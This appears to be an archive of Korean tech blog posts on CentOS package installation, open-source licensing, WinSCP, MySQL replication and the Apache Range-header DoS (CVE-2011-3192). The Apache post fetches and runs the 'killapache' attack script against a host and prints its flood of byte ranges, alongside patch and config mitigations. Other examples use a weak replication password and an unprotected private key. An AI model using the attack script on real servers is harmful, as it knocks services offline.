외부 업체에서 동영상 변환 기능을 적용하기 위해서 ffmpeg, mp4box의 설치를 요청해서 급하게 작업을 하게 되었네요. 오랜만에 터미널에 접속해서 일하게 되었는데 그 설치과정을 정리합니다. 별 내용 없지만 언젠가, 누군가에게 쓰이게 될것을 믿습니다 ㅋ  



mp4box in centos 6



MP4Box

url : http://gpac.wp.mines-telecom.fr/mp4box/

MP4Box는 동영상 파일변환, 동영상 스트리밍을 위한 파일 힌팅을 가능하게 해주는 공개SW입니다.

아래의 링크를 보시면 더 상세한 설명이 있습니다.

http://en.wikipedia.org/wiki/GPAC_Project_on_Advanced_Content



서버환경

제가 설치한 서버의 환경은 CentOS 6.x 64x 입니다.

uname 결과

Linux 2.6.32-220.13.1.el6.x86_64 #1 SMP Tue Apr 17 23:56:34 BST 2012 x86_64 x86_64 x86_64 GNU/Linux



설치과정

설치하려는 ffmpeg 관련 패키지들은 설치후 기본으로 제공되는 저장소에 없는 SW입니다. 따라서 별도의 저장소를 사용할 수 있도록 설정해야 합니다.


1) 다른 저장소 사용하도록 추가할 패키지 다운로드

wget http://apt.sw.be/redhat/el6/en/x86_64/rpmforge/RPMS/rpmforge-release-0.5.2-2.el6.rf.x86_64.rpm


2) 저장소에 접근시 사용할 공개키 가져오기

rpm --import http://apt.sw.be/RPM-GPG-KEY.dag.txt


3) 다운받은 rpm 패키지의 서명 확인 후 설치

rpm -K rpmforge-release-0.5.2-2.el6.rf.*.rpm

rpm -Uvh rpmforge-release-0.5.2-2.el6.rf.x86_64.rpm


4) ffmpeg 관련 패키지 설치

yum install ffmpeg ffmpeg-devel mplayer mencoder


5) MP4Box2 설치

yum 저장소에 있는 것을 설치하고 싶었지만 찾을 수 없어서 그냥 소스로 설치했습니다.


cd /usr/local/src/
wget http://www.repo.bstack.net/mp4box/gpac-0.4.5.tar.gz
wget http://www.repo.bstack.net/mp4box/gpac_extra_libs-0.4.5.tar.gz
tar -zxvf gpac-0.4.5.tar.gz
tar -zxvf gpac_extra_libs-0.4.5.tar.gz
cd gpac_extra_libs
cp -r * /usr/local/src/gpac/extra_lib
cd ..
cd gpac
chmod 755 configure
./configure
make lib
make apps
make install lib
make install
cp bin/gcc/libgpac.so /usr/lib 
install -m644 bin/gcc/libgpac.so /usr/local/lib/libgpac.so
chmod +x /usr/local/lib/libgpac.so
ldconfig


make lib 단계에서 에러발생) /usr/bin/ld: cannot find -lglut

조치)

yum install glut-devel



설치확인

1) File Hinting 확인

MP4Box -hint video.mp4


2) DivX file을 MP4 file로 변환

MP4Box -add file.avi new_file.mp4



참고사이트

이미지 : http://www.oss.kr/oss_intro06

최근 오픈소스SW가 점점 다양한 분야에서 사용하게 되고 있는 추세이며, 따라서 오픈소스SW 라이선스에 대한 바른 정보와 함께 라이선스 준수에 대한 더 많은 생각이 필요합니다.  SW 라이선스 위반사례가 먼 나라의 이야기 같지만 얼마전 삼성전자, 휴맥스가 미국에서 GPL위반으로 제소당하고, MS도 GPL위반에 대한 제기를 받아서 소스코드를 공개하는 등 오픈소스SW 라이선스의 문제는 현실적으로 중요한 이슈입니다.

오늘은 오픈소스SW의 라이선스에 대한 기본 정보를 정리하고, 오픈소스SW 서버를 이용한 다양한 서비스(모바일, 클라우드 등)가 확산되는 최근에 주의깊게 생각해봐야할 AGPL에 대해서 이야기를 좀 해볼까 합니다.

1. 오픈소스SW 라이선스 기본정보 알기

오픈소스SW 라이선스는 전세계적으로 OSI에서 관리합니다.(영문)
http://www.opensource.org/licenses/alphabetical

오픈소스SW 라이선스에 대해서는 국문으로 한국저작권위원회와 공개SW역량플라자에서 좋은 정보를 제공하고 있으니
아래의 정보를 참고하시면 되겠네요.

(한국저작권위원회)

(공개SW역량플라자)
라이선스 비교 : http://www.oss.kr/oss_intro06 
라이선스 설명 : http://www.oss.kr/45607


2. AGPL?
 
최근의 동향에서 볼때 유의해서 지켜볼 라이선스는 서비스를 위해 소스를 수정한 경우에도 코드를 공개할 것을 요구하고 있는 Affero GPL(AGPL)이 아닐까 생각됩니다. AGPL은 기존의 SW개발의 범주를 초과하여 '서버 소프트웨어인 경우에도 반드시 소스 코드를 공개해야 한다'는 제약이 있으므로, 네트워크로 서비스를 하는 경우에도 적용되기 때문입니다.

예를들어, 클라우드서비스 사업자가 AGPL이 적용되는 오픈소스SW를 사용하는 경우 기존의 GPL처럼 생각하면 안됩니다. GPL의 경우 '사용자에게 소스 코드를 공개해야 하는' GPL 제약을 적용하면 서버의 사용자(자기)에게만 공개하면 되기때문에 소스코드공개를 피해갈 수 있으나, APGL은 이 경우에도 소스코드공개가 의무화 됩니다. 
 
즉, NHN, Google 같은 서비스 기업들도 AGPL의 영향을 받는다는 의미죠. 따라서 SaaS, Cloud Service 영역에서 오픈소스SW를 사용하는 경우에 AGPL은 반드시 확인해야 합니다.

AGPL 상세정보 : http://goo.gl/tUzaM

알쏭달쏭 오픈소스SW 라이선스에 대해서 의문사항이 있으시다면 아래의 정보를 이용하사기 바랍니다.


3. 오픈소스SW 라이선스 관련 문의처

오픈소스SW 라이선스에 대하여 궁금하시다면 아래의 링크를 이용하시면 됩니다.(좋은 정보가 있으시면 알려주세요)

1) 공개SW역량플라에서 제공하는 묻고답하기를 이용할 수 있습니다.

2) 아래의 한국저작권위원회를 통해서 상담을 받을 수도 있습니다.
한국저작권위원회 : http://www.olis.or.kr

3)  KOSS 법 센터
- 법무법인 에이팩스는 9월 1일 부설기관으로 `한국 오픈소스 SW(KOSS) 법센터`를 설립


4. 라이선스 검증서비스(무료)

자사의 SW에 대하여 오픈소스SW 라이선스 검증을 받고 싶은 경우는 아래의 서비스를 이용하실 수 있습니다.
공개SW역량플라자 : http://www.oss.kr/oss_news/7405
한국저작권위원회 : http://olis.or.kr/ossw/codeEye/introduction.do


몇일전 컴퓨터를 잘모르는 사람 - (우리 아버님세대쯤의 PC지식 보유상태를 가진 이 사람을 A씨라고 하자)이 질문을 해 왔다.
A씨에게 문제를 차근차근 물어보니
"IE9에서 이 서비스는 정상적으로 지원되지 않습니다" 라는 메시지를 만났는데
그것이 무슨말인지 모르겠다는  이야기였다.

나는 IE9를 제거하고 IE8을 기본으로 사용하게 해주고,
서비스 공급자가 지금 사용하는 브라우저를 지원하지 않는다는 문제를 설명해주었다.
그리고 파이어폭스와 크롬을 추가로 설치해준 다음, 인터넷을 쓰는 다른 방법이 있다는것을 알려주었다.


잠시 빠른속도에 만족하며 쓰다가 십여분도 되기전에 음악감상을 할 수 없다는 이유로 A씨는 이걸로 어떻게 사용하냐고 나에게 반문했고, 나는 그냥 IE8을 기본으로 주로 사용하고 만약 문제가 생겨서 급하게 인터넷에 들어갈때에는 파피어폭스나 크롬을 사용하라고 말해주었다.

A씨의 문제를 해결해주고 돌아와서 좀 생각해보게 되었다.

사람들이 상품을 고를때 다양한 관점으로 이것저것 비교해보고 사는것처럼
브라우저를 선택하는 기준은 여러가지 관점이 있기 마련이다.

인터넷으로 사용할 수 있는 다양한 서비스에 장애가 없는 것이 최선일 수도 있고,
상황에 맞는 가장 빠른 브라우저로 인터넷을 하고 싶을 수도 있으며,
나에게 맞는 다양한 기능을 이것저것 추가하면서 사용하고 싶을 수 도 있다.

우리는 상품을 잘 알면 더 좋은 상품을 손해보지 않고 고를수 있다는 사실을 안다.
브라우저의 장단점을 비교해 볼 수 있는 나의 메인 웹브라우저는 파이어폭스이다.
회사의 직원들도 몇차례의 브라우저 비교를 통해서 이제는 파이어폭스를 대부분 사용하고 있다.
그런데, A씨 같은 경우에는 브라우저를 바꿀 수 있다는 것도 모른채 지낸다.

A씨에게도 웹브라우저를 선택할 자유를 찾아줘야 하는것 아닌가?

Source - http://goo.gl/dFxTJ

덧붙이며.
오늘 파이어폭스 사이트에 가보니 버전이 7.x 대로 다운로드 된다.
이전의 행보에 비추어 생각해보면 엄청난 속도로 버전을 갱신하고 있다.
왜그런지 모르지만 사용자 입장에서는 감사할뿐이다.
여전히 3.x대를 사용하는 나는 아래의 문구를 보고 새버전을 바로 설치했다.
결과는 대 만족.


Source : http://www.mozilla.or.kr/ko/



들어가며

메일함에 공개SW사용기와 관련해서 한통의 메일이 왔습니다. 공모한 글이 적으니 많은 참여를 바란다는 메일인데, 내용을 살펴보니 이번에는 데스크탑에서 사용하는 공개SW의 사용기를 공모하네요. 아무래도 서버용 사용되는 공개SW는 많지만, 데스크탑에서 사용하는 공개SW은 사용자가 적기 때문에 참여자가 적은가 봅니다. 블로그 포스팅도 안한지 오래되고 해서 저도 사용기 하나를 작성하기로 했습니다.

그 덕분에 제 PC에서 사용하고 있는 공개SW를 한번 쭈욱 둘러보게 되었죠.
Cygwin, Vim, FileZilla, WinSCP, Cobian, 7zip, nmap, XAMPP, Eclipse, Aptana, Putty, Firefox, Chrome, tutories SVN, Spring STS ..
후아~ 꽤 많은 공개SW 사용하고 있네요.

많은 SW들이 PC를 재설치할 때마다 지워지고 삭제되고를 반복하는 가운데, 여전 저의 데스탑에서 오랫동안 살아남았으며, 지금도 즐겨 사용하고있는 공개SW는 WinSCP가 아닐까 합니다. 오늘은 WinSCP를 한번 살펴보겠습니다.

WinSCP 소개


요 즘은 대부분의 리눅스 서버에서 보안상 취약한 telnet,ftp를 사용하지 않고 ssh 서버를 운영합니다. ssh는 암호화된 패킷을 송수신하기 때문에 보안상 유리하고, scp 를 통한 파일전송도 가능하기 때문에 대부분의 리눅스 서버에 기본으로 사용하고 있습니다.

CLI 환경을 사랑하는 파워유저들에게는 껌정화면에 흰글씨가 아름다워 보이겠지만, 초급자에게는 ssh 접속과 파일관리가 만만한 일이 아닙니다. 내 컴퓨터의 파일하나를 원격지 리눅스서버에 전송하는것도 큰일이죠.
이런 경우에 바로 WinSCP를 사용할 수 있습니다.



WinSCP는 윈도우환경에서 GUI환경으로 FTP, SSH, SFTP 를 사용가능한 클라이언트 프로그램으로서 저의 데스크탑에서 가장 유용하게 사용하는 공개SW입니다. WinSCP를 이용해서 윈도우 탐색기처럼 원격지 서버와 파일을 쉽게 송수신 할 수 있고, 원격지의 파일을 손쉽게 편집도 가능합니다.



설치하기

1) 브라우저로 http://winscp.net/eng/download.php 에 접속합니다
2) 맨 위쪽에서 최신버전의 ‘Installation package’ 를 클릭하여 파일을 다운로드 합니다
3) 다운로드 받은 파일을 클릭하여 일반적인 윈도우 프로그램 설치과정과 동일하게 설치합니다.

한글지원여부)
최신버전의 파일을 다운로드 받으시면 WinSCP의 한글 버전을 사용할 수 있습니다.
프로그램 설치 시작 시 “한국어” 를 선택할 수 있으며, 프로그램의 한국어 버전이 설치됩니다.

만약 설치 프로그램에서 “한국어”를 선택할 수 없다면,
먼저 영문 설치 버전을 설치한 다음 아래의 translation page로 가서
“Korean” 언어팩을 다운로드 받아서 WinSCP가 실행되는 디렉터리에 ZIP 압축 파일을 풉니다.
translation page : http://winscp.net/eng/translations.php


특징


WinSCP는 영어뿐 아니라 한글을 포함한 다국어를 지원하는 GUI기반의 공개SW로서
많은 특징을 가지고 있습니다. 이미지와 함께 WinSCP의 많은 특징들을 한가지씩 이야기 해보겠습니다.

1) WinSCP를 이용해서 드래그 앤 드롭으로 원격 서버에 파일을 송수신 할 수 있습니다.



2) 바탕화면에 바로가기 아이콘을 생성해서 원클릭으로 서버접속이 가능합니다.



3) SSH-1과 SSH-2를 통한 SFTP 및 SCP 프로토콜 지원. 기존 FTP 프로토콜을 지원합니다



4) 배치파일을 통한 스크립트 실행과 CLI를 지원합니다.



5) 원격지 디렉토리와 PC의 디렉토리 간 동기화를 지원합니다.



6) 자주 쓰는 편집기를 등록해서 서버의 파일을 바로 수정할 수 있습니다.



7) 암호 입력 방식과 공개 키 인증방식을 지원합니다.

 


8) Windows 탐색기 및 Norton Commander 형태의 인터페이스 지원




고급활용


1. 에디트플러스와 WinSCP를 이용한 원격지 서버의 파일 직접수정

EditPlus는 프로그램 편집기로서 아주 강력하지만 ssh 기능이 없으므로 작업하는 도중
원격지의 서버에 파일관련 명령을 실행하기에는 불편합니다. 텍스트 편집기에게 이것저것 다 요구하는것은 너무 많은것을 바라는 것이겠죠?

이때 EditPlus를 WinSCP와 함께 사용하면 원격지의 서버를 윈도우의 탐색기처럼 브라우징 할 수 있고, 서버의 파일을 직접 열어서 항상 사용하는 편집기로 빠르게 편집할 수 있습니다.
물론 텍스트편집기의 원격서버 접속기능을 이용할 수 도 있지만, WinSCP와 함께 사용하면 좀 더 직관적인 인터페이스를 제공하므로 초보자도 리눅스 서버에 쉽게 접속해서 파일 수정이 가능합니다.




2. 디렉토리 동기화


이 기능은 서버의 소스코드를 자신의 PC에 특정폴더와 동기하도록 설정한 다음, PC에서 소스코드를 수정하면 자동으로 원격서버에 반영되는 기능입니다.
자신의 PC안에 있는 파일을 수정하면 원격지에 자동으로 반영되기 때문에 마치 서버의 소스코드를 수정하는 것과 같은 효과가 있습니다.



3. 공개키 인증방식 사용

Putty를 설치하면 인증키를 생성하는 PuTTYgen 프로그램을 사용할 수 있습니다.
1) 프로그램을 실행시키고 ‘Generate’ 버튼을 누른 후 ‘마우스’를 움직이면 키가 생성됩니다.
2) ‘Save private key’ 버튼을 눌러서 파일로 저장했다가 나중에 WinSCP에서 사용합니다.
3) 비밀문구 없이 저장할지를 물어보는데 그냥 저장하겠다고 '확인'버튼을 누릅니다.
4) 붉은 사각형 부분을 긁어서 클립보드에 복사했다가, 원격서버의 /사용자홈/.ssh/authorized_keys 파일에 한 줄로 복사해넣습니다.
5) 아래 화면과 같이 저장한 개인키를 WinSCP 접속정보에 입력해 줍니다
6) 접속을 시도하면 공개키 기반의 인증을 사용하여 접속됩니다.


트러블슈팅


- UTF-8환경에서 한글이 깨어지는 경우에는, 로그인화면 > 환경 > 파일이름을 UTF-8 인코딩
이라고 표시된 부분을 '자동'에서 '사용'으로 변경하신 후 접속하시면 UTF-8 형식을 사용합니다.






참고자료 및 링크


WinSCP Manual - http://winscp.net/eng/docs/start
WinSCP 스크립트 명령실행 활용 - http://calmmass.tistory.com/49
WinSCP 디렉토리 동기화 - http://goo.gl/jZeFv
WinSCP User Manual - http://infotech.adelphi.edu/pdfs/WinSCP_usermanual.pdf


마치며

WinSCP 의 기능을 정리하면서 생각해보니, 진짜 필수적인 기능들을 많이 제공하는것을 새삼 알게되었습니다. 특히 디렉토리 동기화같은 기능은 상용 프로그램에서도 흔히 볼 수 없는 좋은 기능이고, 이런 좋은 SW를 공개한 개발자들에게 고마운 마음이 듭니다. 저도 공개SW를 사용하는 사용자의 입장에서가 아니라 실력을 좀 키워서 좋은 공개W를 만들어서 다같이 사용할 수 있었으면 좋겠네요.


얼마전 아파치 웹서버 무력화시킬 심각한 DoS 결함 발견 이라는 기사가 나왔습니다. 메일링 리스트를 보니 영향 받는 소프트웨어는
Apache 1.3.x 및 이전, Apache 2.2.19 이전 버전이라고 하니 현재의 아파치 웹서버 대부분이 해당되는 이슈입니다. 따라서 아파치 웹서버를 사용하는 국내의 서버관리자들, 그리고 아파치가 탑재된 각종 산업분야의 엔지니어들은 빠른 대응을 해야겠습니다. 저도 처리해야지 하다가 오늘에서야 시간이 나서 후다닥 해치웠습니다. 개략적인 내용과 조치방법을 정리했으니 유용하게 사용하시기 바랍니다.

Range 요청 취약점?

http는 헤더정보에 Range를 사용해서 콘텐츠의 일부만 요청할 수 있습니다 . 파일 이어받기 또는 p2p 등에서 파일의 일부만을 특정 서버에서 받고자 할 때, video 스트리밍, pdf 등의 다운로드가 사용합니다. 이번의 이슈는 이 http header 에 Range를 요청하는 취약점을 이용해서 아파치 웹서버에 DoS 공격이 가능하다는 것이죠

Range ?
Range: bytes= n-m
문서가 요구하는 부분적인 범위를 명시한다. 여러 개의 범위는 세미콜론으로 구분하여 나열한다. 만일 쉼표로 구별된 바이트 범위인 첫째 숫자가 없다면 범위는 문서의 끝에서부터 센다고 가정한다. 만일 둘째 숫자가 없다면 범위는 끝에서 바이트 n까지이다. 첫째 바이트는 바이트 0이다.


이 공격을 테스트하기 위해서 http://goo.gl/gKMYo 의 Apache Killer 스크립트를 다운로드 받았습니다.

cpan -i Parallel::ForkManager
wget http://static.hackersgarage.com/killapache.pl.hackersgarage.com
mv killapache.pl.hackersgarage.com killapache.pl

실행 권한 부여
chmod u+x killapache.pl

공격시도
perl killapache.pl example.com 50

killapache.pl 스크립트는 아래와 같은 Range 요청을 해당 웹서버에 보냅니다.

HEAD / HTTP/1.1
Host: 192.168.10.140
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-
16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-
33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-
50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-
67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-
84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-
101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,5-111,5-112,5-113,5-114,5-
115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,5-125,5-126,5-127,5-128,5-
129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,5-139,5-140,5-141,5-142,5-
143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,5-153,5-154,5-155,5-156,5-
157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,5-167,5-168,5-169,5-170,5-
171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180,5-181,5-182,5-183,5-184,5-
185,5-186,5-187,5-188,5-189,5-190,5-191,5-192,5-193,5-194,5-195,5-196,5-197,5-198,5-
199,5-200,5-201,5-202,5-203,5-204,5-205,5-206,5-207,5-208,5-209,5-210,5-211,5-212,5-
213,5-214,5-215,5-216,5-217,5-218,5-219,5-220,5-221,5-222,5-223,5-224,5-225,5-226,5-
227,5-228,5-229,5-230,5-231,5-232,5-233,5-234,5-235,5-236,5-237,5-238,5-239,5-240,5-
241,5-242,5-243,5-244,5-245,5-246,5-247,5-248,5-249,5-250,5-251,5-252,5-253,5-254,5-
255,5-256,5-257,5-258,5-259,5-260,5-261,5-262,5-263,5-264,5-265,5-266,5-267,5-268,5-
269,5-270,5-271,5-272,5-273,5-274,5-275,5-276,5-277,5-278,5-279,5-280,5-281,5-282,5-
283,5-284,5-285,5-286,5-287,5-288,5-289,5-290,5-291,5-292,5-293,5-294,5-295,5-296,5-
297,5-298,5-299,5-300,5-301,

--CUT--

1016,5-1017,5-1018,5-1019,5-1020,5-1021,5-1022,5-1023,5-1024,5-1025,5-1026,5-1027,5-
1028,5-1029,5-1030,5-1031,5-1032,5-1033,5-1034,5-1035,5-1036,5-1037,5-1038,5-1039,5-
1040,5-1041,5-1042,5-1043,5-1044,5-1045,5-1046,5-1047,5-1048,5-1049,5-1050,5-1051,5-
1052,5-1053,5-1054,5-1055,5-1056,5-1057,5-1058,5-1059,5-1060,5-1061,5-1062,5-1063,5-
1064,5-1065,5-1066,5-1067,5-1068,5-1069,5-1070,5-1071,5-1072,5-1073,5-1074,5-1075,5-
1076,5-1077,5-1078,5-1079,5-1080,5-1081,5-1082,5-1083,5-1084,5-1085,5-1086,5-1087,5-
1088,5-1089,5-1090,5-1091,5-1092,5-1093,5-1094,5-1095,5-1096,5-1097,5-1098,5-1099,5-
1100,5-1101,5-1102,5-1103,5-1104,5-1105,5-1106,5-1107,5-1108,5-1109,5-1110,5-1111,5-
1112,5-1113,5-1114,5-1115,5-1116,5-1117,5-1118,5-1119,5-1120,5-1121,5-1122,5-1123,5-
1124,5-1125,5-1126,5-1127,5-1128,5-1129,5-1130,5-1131,5-1132,5-1133,5-1134,5-1135,5-
1136,5-1137,5-1138,5-1139,5-1140,5-1141,5-1142,5-1143,5-1144,5-1145,5-1146,5-1147,5-
1148,5-1149,5-1150,5-1151,5-1152,5-1153,5-1154,5-1155,5-1156,5-1157,5-1158,5-1159,5-
1160,5-1161,5-1162,5-1163,5-1164,5-1165,5-1166,5-1167,5-1168,5-1169,5-1170,5-1171,5-
1172,5-1173,5-1174,5-1175,5-1176,5-1177,5-1178,5-1179,5-1180,5-1181,5-1182,5-1183,5-
1184,5-1185,5-1186,5-1187,5-1188,5-1189,5-1190,5-1191,5-1192,5-1193,5-1194,5-1195,5-
1196,5-1197,5-1198,5-1199,5-1200,5-1201,5-1202,5-1203,5-1204,5-1205,5-1206,5-1207,5-
1208,5-1209,5-1210,5-1211,5-1212,5-1213,5-1214,5-1215,5-1216,5-1217,5-1218,5-1219,5-
1220,5-1221,5-1222,5-1223,5-1224,5-1225,5-1226,5-1227,5-1228,5-1229,5-1230,5-1231,5-
1232,5-1233,5-1234,5-1235,5-1236,5-1237,5-1238,5-1239,5-1240,5-1241,5-1242,5-1243,5-
1244,5-1245,5-1246,5-1247,5-1248,5-1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-
1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-
1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-
1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-
1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299
Accept-Encoding: gzip
Connection: close

그 결과 버그가 존재하는 아파치 웹서버의 경우에는 아래와 같이 시스템의 CPU, 메모리등의 자원을 엄청나게 소모하게 되고 결국 정상적인 서비스가 불가능하게 됩니다.




조치방법

이 보안 이슈에 대응하는 방법은 두가지가 있습니다. 현재 이슈가 해결된 버전이 이미 나와있기 때문에 가장 좋은 방법은 아파치 웹서비스 패키지를 최신으로 업데이트하는 것이 좋습니다, 하지만 운영중인 서비스에 대해서 재설치의 압박이 있는 경우도 있으니 그런 경우라면 웹서버 Range header의 조건을 검사하여 차단하는 방법이 있습니다.

1) Apache 2.2.20 업데이트(Apache 2.2.20 for CentOS 5.x)

소스 컴파일을 하시는 경우에는 홈페이지에서(http://httpd.apache.org/download.cgi) 최신 소스코드를 다운받아 설치하시기 바랍니다. 저는 CentOS 5.5 를 사용하는데 아직 yum repository 에는 최신의 아파치 rpm이 없기 때문에 다른곳을 이용해서 설치했습니다.

Yum repository 추가(자신의 환경에 맞는 repository를 추가해 줍니다)
i386 :
rpm -ihv http://centos.alt.ru/repository/centos/5/i386/centalt-release-5-3.noarch.rpm

x86_64:
rpm -ihv http://centos.alt.ru/repository/centos/5/x86_64/centalt-release-5-3.noarch.rpm

설치된 Repository 확인
yum repolist

아파치 버전 확인
yum --enablerepo=CentALT list httpd

아파치 업데이트
yum --enablerepo=CentALT install httpd

웹서버 재시작
service httpd restart


2) http header의 Range 요청을 검사해서 차단하는 방법

대부분 정상적인 Range 요청시 필드가 5개 이상은 넘지 않기 때문에 5개를 넘는 Range 요청이 있다면 Range 요청은 리셋하는 방법입니다. 웹서버 환경설정 파일을 아래와 같이 새로 추가합니다.(rpm으로 설치했다면 /etc/httpd/conf.d/ 안에 생성)

/etc/httpd/conf.d/range-CVE-2011-3192.conf 파일의 내용

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (?:,.*?){5,5} bad-range=1
RequestHeader unset Range env=bad-range

# We always drop Request-Range; as this is a legacy
# dating back to MSIE3 and Netscape 2 and 3.
RequestHeader unset Request-Range

웹서버 재시작
service httpd restart


CVE 자료(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192) 를 보니 8/19에 접수된 이슈인데 8/30 이슈가 해결된 아파치 2.2.20 버전이 나왔습니다. 이번 일을 통해서 다시한번 오픈소스SW의 보안에 대한 빠른 대응을 느끼게 됩니다. SW를 개발하는 입장에서 보면 아파치정도의 세계시장 점유율을 가진 소프트웨어가 이렇게 빠르게 대응하는 것이 가능할까하는 의문이 듭니다. 이것이 오픈소스SW의 힘이겠죠  :-)


참고 자료


Source : MySQL-Replication-Tutorial, MySQL Conference and Expo

Replication?

MySQL Cluster가 동기화 (synchronous) 리플리케이션과을 수행하는것과는 다르게, MySQL은 단 방향, 즉 비동기 리플리케이션 (asynchronous replication)을 지원합니다. MySQL Replication은 하나의 서버가 마스터로 동작하고, 나머지 한 개 이상의 다른 서버들이 슬레이브로 동작하여 마스터의 Binlog를 이용하여 슬레이브가 복제를 수행하고, Relay Binlog에 기록하는 기술을 의미합니다. 즉, 마스터의 MySQL을 슬레이브가 똑같이 복사해서 가지고 있는것이죠.

MySQL Replication은 데이터 백업의 용도뿐만 아니라, 데이터베이스에 대한 입출력을 각서버에 나누에 수행시켜 부하를 분산시키거나, 여러개의 마스터를 이용한 고가용성의 확보등에 사용됩니다.


준비사항

마스터, 슬레이브에서 사용하는 MySQL의 버전을 확인하여 가능한 동일한 버전으로 일치시키는 것이 좋으며, 마스터보다는 슬레이브의 버전이 높아야 안정적인 작동을 보장합니다.
MySQL 이중화 상태에서 Replication Fail Bug 에 대한 최근의 자료(http://goo.gl/fSlxb)를 보면 PK가 없는 테이블의 Null값을 업데이트 하는 경우 Replication이 실패하는 경우가 있다고 하니, 버그가 해결된 최신버전을  업데이트한 후 사용하시기를 권고합니다.

CentOS 5.5 에서 MySQL 5.5.15 설치방법
1) Install Remi repository
rpm -Uvh http://rpms.famillecollet.com/enterprise/remi-release-5.rpm

2) Check Available MySQL versions
yum --enablerepo=remi,remi-test list mysql mysql-server

3) Install MySQL
yum --enablerepo=remi,remi-test install mysql mysql-server


Master 에서 준비할 일

1) my.cnf 파일에 마스터의 설정 추가
server-id = 고유한상수값
binlog-do-db = 복제할 원본 DB명 A
binlog-do-db = 복제할 원본 DB명 B
binlog-ignore-db = 복제하지않을 원본 DB명 A
binlog-ignore-db = 복제하지않을 원본 DB명 B
log-bin = Binlog 파일명

예)
server-id = 1
binlog-do-db = testdb
log-bin=mysql-master-bin

2) 슬레이브에서 Replication을 위해 접속할 유저를 생성하고 권한부여
CREATE USER '사용자아이디'@'접속을 허용할 호스트주소' IDENTIFIED BY '사용자비밀번호';
GRANT REPLICATION SLAVE ON *.* TO '사용자아이디'@'접속을 허용할 호스트주소';

예)
mysql> CREATE USER 'repl_user'@'%' IDENTIFIED BY 'abc1234';
mysql> grant replication slave on *.* to 'repl_user'@'%' identified by 'abc1234';


3) 슬레이브에 적용할 데이터베이스의 스냅샵 덤프파일 준비
mysqldump -u root -p db명 > 파일명.sql

예)
mysqldump -u root -p testdb > testdb.sql


Slave 에서 준비할 일

1) my.cnf 파일에 슬레이브의 설정 추가
server-id = 고유한상수값
relay-log = Relay Binlog 파일명

예)
server-id = 2
relay-log = slave-relay-bin

2) master에서 덤프한 파일을 임포트
마스터에서 미리 덤프한 파일을 슬레이브로 복사하고, 그 파일을 이용하여 슬레이브의 MySQL DB에 임포트합니다.
mysql -u root -p db명 < 파일명.sql

예)
mysql -u root -p testdb < testdb.sql

3) 마스터에 대한 설정
MySQL 콘솔창에서 마스터의 호스트주소, 사용자명, 비밀번호, Binlog 파일명, Position 등을 아래와 같이 설정합니다.
(이때 사용하는 Binlog 파일명과 log position의 값은 마스터의 MySQL을 재시작하고, show master status 명령으로 확인합니다.)


mysql> CHANGE MASTER TO
    ->     MASTER_HOST='master_host_name',
    ->     MASTER_USER='replication_user_name',
    ->     MASTER_PASSWORD='replication_password',
    ->     MASTER_LOG_FILE='recorded_log_file_name',
    ->     MASTER_LOG_POS=recorded_log_position;

예)
mysql> change master to
    ->     master_host='192.168.10.10',
    ->     master_user='repl_user',
    ->     master_password='abc1234',
    ->     master_log_file='mysql-master-bin.000004',
    ->     master_log_pos=640;


결과 확인

이제 모든 설정을 마쳤으니, 마스터와 슬레이브의 MySQL 서버를 재구동 해주시고. 정상적으로 작동하는지 확인을 위하여 아래의 방법을 사용합니다.

1) 마스터의 상태확인을 위해서 아래의 명령을 이용합니다.
show master status;


2) 슬레이브의 상태확인을 위해서 아래의 명령을 이용합니다.
show slave status\G


모니터링

MySQL Replication을 구성하고 난 후, 정상작동여부를 모니터링하여 마스터와 슬레이브의 내용이 다른 경우 메일로 통보받는 것이 가능합니다. 아래 링크의 SW는 마스터의 Binlog와 Position을 가져와서 슬레이브의 상태와 비교하고 같지않은 경우에 메일로 통보하는 로직으로 구현된 SW입니다.

http://forge.mysql.com/tools/tool.php?id=6
http://datacharmer.blogspot.com/2011/04/refactored-again-poor-mans-mysql.html



고급활용

MySQL의 5.x대에 들어오면서 Replication은 row-based, semi-synch, delayed, Circular,  Master-Master Replication, SSL Turnnel, Proxy 등의 다양한 고급활용이 가능합니다. 고급활용에 대한 상세한 내용은 이번 글에서 다루지 않으니, 아래에 제시한 참고자료의 링크를 이용하시기 바랍니다.


참고자료





녹색성장이 국가에서 추진하는 정책이다 보니, 최근 탄소배출량을 줄이기 위한 에너지 절감에 대한 이야기가 자주 거론 됩니다. 많은 기업들이 에너지 절약에 주목하고 있는 것이 대세이고, 그 일환으로 마이크로소프트에서는 Windows 7 의 전원관리 기술에 대한 보도자료(http://www.microsoft.com/korea/events/2011/powersave/)를 통해 낮은 전력소비량을 이야기 하고 있습니다. 요약하면 Windows XP 보다는 Windows 7 을 사용하는 것이 에너지 절감에 유리하다는 내용이죠.

Source : http://www.microsoft.com/korea/events/2011/powersave/


